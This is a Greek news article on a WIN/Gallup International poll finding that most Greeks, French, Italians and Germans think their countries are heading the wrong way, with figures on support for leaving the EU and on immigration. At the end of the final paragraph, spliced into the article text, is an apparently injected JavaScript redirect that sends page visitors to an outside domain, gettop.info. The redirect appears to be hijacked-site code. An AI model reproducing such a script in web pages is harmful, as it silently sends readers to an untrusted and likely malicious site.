Σε λάθος κατεύθυνση πηγαίνει η Ελλάδα για το 89% των πολιτών

0
7

 

Γάλλοι, Γερμανοί, Έλληνες και Ιταλοί θεωρούν ότι οι χώρες τους οδεύουν στη λάθος κατεύθυνση, αν και δεν σκοπεύουν να ακολουθήσουν τη Βρετανία και το Βrexit.

Σύμφωνα με τη διαδικτυακή δημοσκόπηση WIN/Gallup International σε δείγμα 14.969 ατόμων, οι ψηφοφόροι στην ΕΕ είναι δυσαρεστημένοι. Ωστόσο ακόμη στηρίζουν την ΕΕ κατά 60% σε περισσότερα από τα μεγαλύτερα κράτη-μέλη.

Το 89% των ψηφοφόρων στην Ελλάδα πιστεύουν ότι η χώρα τους πηγαίνει σε λάθος κατεύθυνση. Στη Γαλλία, το ποσοστό ανέρχεται στο 82%, στην Ιταλία στο 79% και στη Γερμανία στο 62%. Ενώ όμως είναι εμφανής η δυσφορία των ψηφοφόρων της ΕΕ, η αύξηση στο ποσοστό των ατόμων που θα ψήφιζαν για έξοδο από την ΕΕ είναι πολύ χαμηλή: 36%, από το 33% σε 15 χώρες που ερωτήθηκαν, συμπεριλαμβανόμενης και της Βρετανίας.

Το ποσοστό των ατόμων στη Γερμανία, στη Γαλλία και το Βέλγιο που θα ψήφιζαν να φύγουν σημείωσε πτώση, ενώ αντίθετα σε Φινλανδία και Ελλάδα παρατηρήθηκε αύξηση, στο 40% από το 29% (Φινλανδία) και 46% από 38% (Ελλάδα), σε σχέση με πέρυσι.

Επίσης σε όλη την Ευρώπη, 60% είπαν ότι θα προτιμούσαν να είχαν λιγότερους μετανάστες και πρόσφυγες. Στην Ελλάδα, το ποσοστό ήταν 86%, ενώ στην Ιταλία ήταν 75% και στη Γερμανία 64%.

Η δημοσκόπηση έγινε από τις 25 Νοεμβρίου έως τις 7 Δεκεμβρίου, πριν από την επίθεση με φορτηγό σε πολυπληθή χριστουγεννιάτικη αγορά του Βερολίνου στις 19 Δεκεμβρίου. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here